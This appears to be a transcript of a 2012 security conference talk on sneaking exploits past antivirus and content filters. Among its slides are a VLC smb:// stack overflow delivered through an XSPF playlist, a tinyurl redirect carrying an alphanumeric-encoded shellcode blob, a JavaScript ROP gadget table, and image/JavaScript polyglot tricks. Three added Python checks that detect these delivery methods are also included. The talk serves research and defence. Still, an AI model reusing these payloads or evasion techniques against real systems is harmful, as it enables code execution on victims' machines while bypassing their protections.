When Bad Things Come In Good Packages

My DEEPSEC 2012 talk explores the fine art of packaging when it comes to exploits. No, this is not another talk about packers or crypters. We are talking STYLE! A successful exploit is one that is innovatively delivered, in style. We shall be talking about a number of sneaky, funny and innovative techniques for delivering exploits to their doorsteps without annoyances like anti-virus or content filtering getting in the way.

This talk goes beyond the obvious obfuscation. We combine the power of web hacking, the power of sophisticated exploit development and goofball creativity to ensure that exploits get delivered and detonate on time, as planned. Did you know you can literally paint an exploit on canvas? Have you heard of chameleon Javascript? This and more in the talk!


When Bad Things Come In Good Packages

  1. when Bad Things come in Good packages. Saumil Shah, net-square. DEEPSEC 2012
  2. # who am i
     Saumil Shah, CEO Net-Square.
     •  Hacker, Speaker, Trainer, Author - 15 yrs in Infosec.
     •  M.S. Computer Science, Purdue University.
     •  saumil@net-square.com
     •  LinkedIn: saumilshah
     •  Twitter: @therealsaumil
  3. My area of work: Penetration Testing, Reverse Engineering, Exploit Writing, New Research, Offensive Security, Attack Defense, Conference Speaker, Conference Trainer, "Eyes and ears open".
  4. When two forces combine... Web Hacking + Binary Exploits
  5. SNEAKY LETHAL
  6. (image only)
  7. 302, IMG, JS, HTML5
  8. (image only)
  9. VLC smb overflow
     •  smb://example.com@0.0.0.0/foo/ #{AAAAAAAA....}
     •  Classic Stack Overflow.
  10. VLC XSPF file
     <?xml version="1.0" encoding="UTF-8"?>
     <playlist version="1" xmlns="http://xspf.org/ns/0/"
               xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
       <title>Playlist</title>
       <trackList>
         <track>
           <location>smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}</location>
           <extension application="http://www.videolan.org/vlc/playlist/0">
             <vlc:id>0</vlc:id>
           </extension>
         </track>
       </trackList>
     </playlist>
  11. Alpha Encoded Tiny Exploit URL. ZOMFG!
  12. 100% Pure Alphanum!
  13. VLC smb overflow - HTMLized!
     <embed type="application/x-vlc-plugin" width="320" height="200"
            target="http://tinyurl.com/ycctrzf" id="vlc" />
  14. 301 Redirect from tinyurl
     HTTP/1.1 301 Moved Permanently
     X-Powered-By: PHP/5.2.12
     Location: smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
       AAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1
       JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNOQeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAA
       AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
       AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
       AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
       AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
       AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYII
       IIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoL
       KPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIPQdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHk
       PfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJcEaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxH
       kEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOsIPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDn
       CUCHPeEPAA}
     Content-type: text/html
     Content-Length: 0
     Connection: close
     Server: TinyURL/1.6
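The redirect on slide 14 is the delivery step: a URL shortener answers a plain web request with a 301 whose Location is an smb:// URL that carries credentials in the authority and an overlong, purely alphanumeric fragment, and a browser plugin follows it. An outbound proxy or a URL-expansion service can refuse to hand such a redirect to a client. The check below is an added example, not code from the talk or from Net-Square; the response samples are constructed (the payload is replaced by a run of placeholder bytes) and the MAX_FRAGMENT threshold is an assumed value to tune per environment.

```python
"""Flag HTTP redirects that point a client at a non-web scheme.

Added example, not from the talk. Only the response head is parsed, so
the body is never touched. All sample data is constructed.
"""
from __future__ import annotations

from urllib.parse import urlsplit

WEB_SCHEMES = {"http", "https"}
MAX_FRAGMENT = 256  # assumed threshold; real fragments are rarely this long
REDIRECT_CODES = {301, 302, 303, 307, 308}


def parse_response(raw: bytes) -> tuple[int, dict[str, str]]:
    """Parse an HTTP/1.x response head into (status_code, headers).

    Header names are lower-cased so lookups are case-insensitive."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def assess_redirect(raw: bytes) -> list[str]:
    """Return the reasons to block this redirect (empty list = looks ordinary)."""
    status, headers = parse_response(raw)
    if status not in REDIRECT_CODES or "location" not in headers:
        return []
    loc = urlsplit(headers["location"])
    reasons = []
    if loc.scheme.lower() not in WEB_SCHEMES:
        reasons.append(f"non-web scheme: {loc.scheme}")
    if "@" in loc.netloc:
        reasons.append("credentials embedded in authority")
    if len(loc.fragment) > MAX_FRAGMENT:
        reasons.append(f"oversized fragment ({len(loc.fragment)} bytes)")
    return reasons


# Constructed sample shaped like the slide's 301; the payload is a placeholder.
SAMPLE_EVIL = (
    b"HTTP/1.1 301 Moved Permanently\r\n"
    b"X-Powered-By: PHP/5.2.12\r\n"
    b"Location: smb://example.com@0.0.0.0/foo/#{" + b"A" * 400 + b"}\r\n"
    b"Content-type: text/html\r\n"
    b"Content-Length: 0\r\n"
    b"Connection: close\r\n\r\n"
)
# Constructed ordinary redirect for comparison.
SAMPLE_BENIGN = (
    b"HTTP/1.1 301 Moved Permanently\r\n"
    b"Location: https://example.com/page\r\n\r\n"
)

if __name__ == "__main__":
    for name, sample in (("evil", SAMPLE_EVIL), ("benign", SAMPLE_BENIGN)):
        print(name, assess_redirect(sample) or "ok")
```

Each reason stands on its own: a non-web scheme is enough to block on its own, and the credential and fragment checks catch variants that switch to a web scheme but keep the same shape.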
  15. (image only)
  16. Exploits as Images - 1
     •  Grayscale encoding (0-255).
     •  1 pixel = 1 character.
     •  Perfectly valid image.
     •  Decode and Execute!
  17. (image only)
  18. "I'm an evil Javascript" / "I'm an innocent image"
  19. Script rendered on a <CANVAS> (text as shown on the slide, cut off at the end):
     function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}
     var addressof=new Array();
     addressof["ropnop"]=0x6d81bdf0;
     addressof["xchg_eax_esp_ret"]=0x6d81bdef;
     addressof["pop_eax_ret"]=0x6d906744;
     addressof["pop_ecx_ret"]=0x6d81cd57;
     addressof["mov_peax_ecx_ret"]=0x6d979720;
     addressof["mov_eax_pecx_ret"]=0x6d8d7be0;
     addressof["mov_pecx_eax_ret"]=0x6d8eee01;
     addressof["inc_eax_ret"]=0x6d838f54;
     addressof["add_eax_4_ret"]=0x00000000;
     addressof["call_peax_ret"]=0x6d8aec31;
     addressof["add_esp_24_ret"]=0x00000000;
     addressof["popad_ret"]=0x6d82a8a1;
     addressof["call_peax"]=0x6d802597;
     function call_ntallocatevirtualmemory(baseptr,size,callnum){
     var ropnop=packv(addressof["ropnop"]);
     var pop_eax_ret=packv(addressof["pop_eax_ret"]);
     var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);
     var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);
     var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);
     var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);
     var call_peax_ret=packv(addressof["call_peax_ret"]);
     var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);
     var popad_ret=packv(addressof["popad_ret"]);
     var retval="";
  20. See no eval()
  21. Same Same No Different!
     var a = eval(str);
     a = (new Function(str))();
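Slides 16 and 21 together describe the defender's problem: the script is stored as grayscale pixels (one pixel per character) and the loader that brings it back never calls eval(), so a filter that looks for eval in page scripts sees nothing. Two checks follow from that. Text decoded from an image that is almost entirely printable ASCII is not a photograph, and "run this string as code" has more spellings than eval: the Function constructor and string-argument timers do the same job. The scanner below is an added example, not code from the talk or from Net-Square. It assumes the caller has already pulled pixel values out of the image with an imaging library and passes them in as a plain list; the sample pixel lists and the sink list are constructed.

```python
"""Scan text, including text decoded from image pixels, for code-execution sinks.

Added example, not from the talk. Pixel values arrive as a plain list
(assumption: extracted elsewhere with an imaging library). Samples are constructed.
"""
import re

# Ways of turning a string into running code. Constructed list; extend as needed.
EXEC_SINKS = {
    "eval": re.compile(r"\beval\s*\("),
    "Function constructor": re.compile(r"\bnew\s+Function\s*\(|\bFunction\s*\(\s*['\"]"),
    "setTimeout(string)": re.compile(r"\bset(?:Timeout|Interval)\s*\(\s*['\"]"),
    "document.write": re.compile(r"\bdocument\.write(?:ln)?\s*\("),
}


def decode_grayscale(pixels):
    """Map 0-255 pixel values to characters, one pixel per character (slide 16's scheme)."""
    return "".join(chr(v & 0xFF) for v in pixels)


def printable_ratio(text):
    """Fraction of characters that are printable ASCII; encoded script scores near 1.0."""
    if not text:
        return 0.0
    return sum(32 <= ord(c) < 127 for c in text) / len(text)


def find_exec_sinks(text):
    """Return the names of the dynamic-execution constructs present in text."""
    return sorted(name for name, pat in EXEC_SINKS.items() if pat.search(text))


def assess_pixels(pixels, min_ratio=0.95):
    """Decode pixels as text and report whether the result looks like script.

    Returns (looks_like_text, sinks_found); sinks are only searched for when
    the decoded bytes are overwhelmingly printable, which real image data is not."""
    text = decode_grayscale(pixels)
    looks_like_text = printable_ratio(text) >= min_ratio
    return looks_like_text, (find_exec_sinks(text) if looks_like_text else [])


# Constructed samples: a script hidden as pixel values, and photo-like noise.
HIDDEN = [ord(c) for c in 'var a=(new Function(str))();setTimeout("a()",0);']
PHOTO = [0, 255, 17, 200, 3, 9, 250, 1, 130, 4, 7, 255, 0, 0, 2]

if __name__ == "__main__":
    print(assess_pixels(HIDDEN))   # (True, ['Function constructor', 'setTimeout(string)'])
    print(assess_pixels(PHOTO))    # (False, [])
```

The printable-ratio gate is what keeps the sink search cheap and quiet: ordinary image data fails it immediately, and only the rare all-printable channel gets the regex pass.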
  22. IMAJS. "I iz being a Javascript"
  23. IMAJS
     <img src="itsatrap.gif">
     <script src="itsatrap.gif"></script>
  24. IMAJS-GIF Browser Support
     Height Width   Browser/Viewer    Image Renders?   Javascript Executes?
     2f 2a  00 00   Firefox           yes              yes
     2f 2a  00 00   Safari            yes              yes
     2f 2a  00 00   IE                no               yes
     2f 2a  00 00   Chrome            yes              yes
     2f 2a  00 00   Opera             ?                ?
     2f 2a  00 00   Preview.app       yes              -
     2f 2a  00 00   XP Image Viewer   no               -
     2f 2a  00 00   Win 7 Preview     yes              -
  25. IMAJS-BMP Browser Support
     Height Width   Browser/Viewer    Image Renders?   Javascript Executes?
     2f 2a  00 00   Firefox           yes              yes
     2f 2a  00 00   Safari            yes              yes
     2f 2a  00 00   IE                yes              yes
     2f 2a  00 00   Chrome            yes              yes
     2f 2a  00 00   Opera             yes              yes
     2f 2a  00 00   Preview.app       yes              -
     2f 2a  00 00   XP Image Viewer   yes              -
     2f 2a  00 00   Win 7 Preview     yes              -
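The tables on slides 24 and 25 rest on one detail: the bytes 2f 2a in the image's dimension field spell "/*", so a script engine that is handed the file treats the whole image header as a comment and runs whatever follows the matching "*/", while image viewers happily render it. That gives a content filter something concrete to look for without decoding the image. The check below is an added example, not code from the talk or from Net-Square: it reads only the GIF and BMP header fields, then looks for a comment terminator followed by script-like text. The minimal header builders and the SCRIPT_HINTS list are constructed for the test and produce no image data.

```python
"""Detect image files whose header doubles as the opening of a JavaScript comment.

Added example, not from the talk. Reads header fields only; sample files
are constructed in-line and contain no pixel data.
"""
import struct

# Constructed hint list: tokens that would be unusual in image data after a "*/".
SCRIPT_HINTS = (b"function", b"eval(", b"new Function", b"document.", b"window.")


def image_dimension_bytes(data):
    """Return (kind, raw bytes of the first dimension field) or (None, b'')."""
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "gif", data[6:10]          # logical screen width and height, 2 bytes each, LE
    if data[:2] == b"BM" and len(data) >= 26:
        return "bmp", data[18:26]         # biWidth and biHeight, 4 bytes each, LE
    return None, b""


def is_imajs_candidate(data):
    """True when the dimension field opens a JS comment and script text follows its close."""
    kind, dims = image_dimension_bytes(data)
    if kind is None or not dims.startswith(b"/*"):
        return False
    end = data.find(b"*/", 2)
    if end == -1:
        return False                      # comment never closes: nothing would run
    tail = data[end + 2:]
    return any(hint in tail for hint in SCRIPT_HINTS)


def build_sample_gif(width, height, tail=b""):
    """Constructed minimal GIF header (no image data) for exercising the check."""
    return b"GIF89a" + struct.pack("<HH", width, height) + b"\x00\x00\x00" + tail


def build_sample_bmp(width, height, tail=b""):
    """Constructed minimal BMP file header plus BITMAPINFOHEADER (no pixel data)."""
    file_header = b"BM" + struct.pack("<IHHI", 0, 0, 0, 54)
    info_header = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0, 0, 0, 0, 0, 0)
    return file_header + info_header + tail


if __name__ == "__main__":
    normal = build_sample_gif(320, 200)
    polyglot = build_sample_gif(0x2A2F, 0, b"*/ function x(){} ")   # width bytes 2f 2a
    print(is_imajs_candidate(normal), is_imajs_candidate(polyglot))  # False True
```

A width of 0x2A2F pixels is the tell: it is a legal but absurd dimension, so a filter can also simply reject images whose width or height field decodes to that value, regardless of what follows.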
  26. The αq Exploit
  27. Demo: IMAJS αq FTW!
  28. Alpha encoded exploit code + IMAJS CANVAS "loader" script
  29. These are not the sploits you're looking for
  30. No virus threat detected
  31. The FUTURE?
  32. when Bad Things come in Good packages. THE END. @therealsaumil, saumil@net-square.com
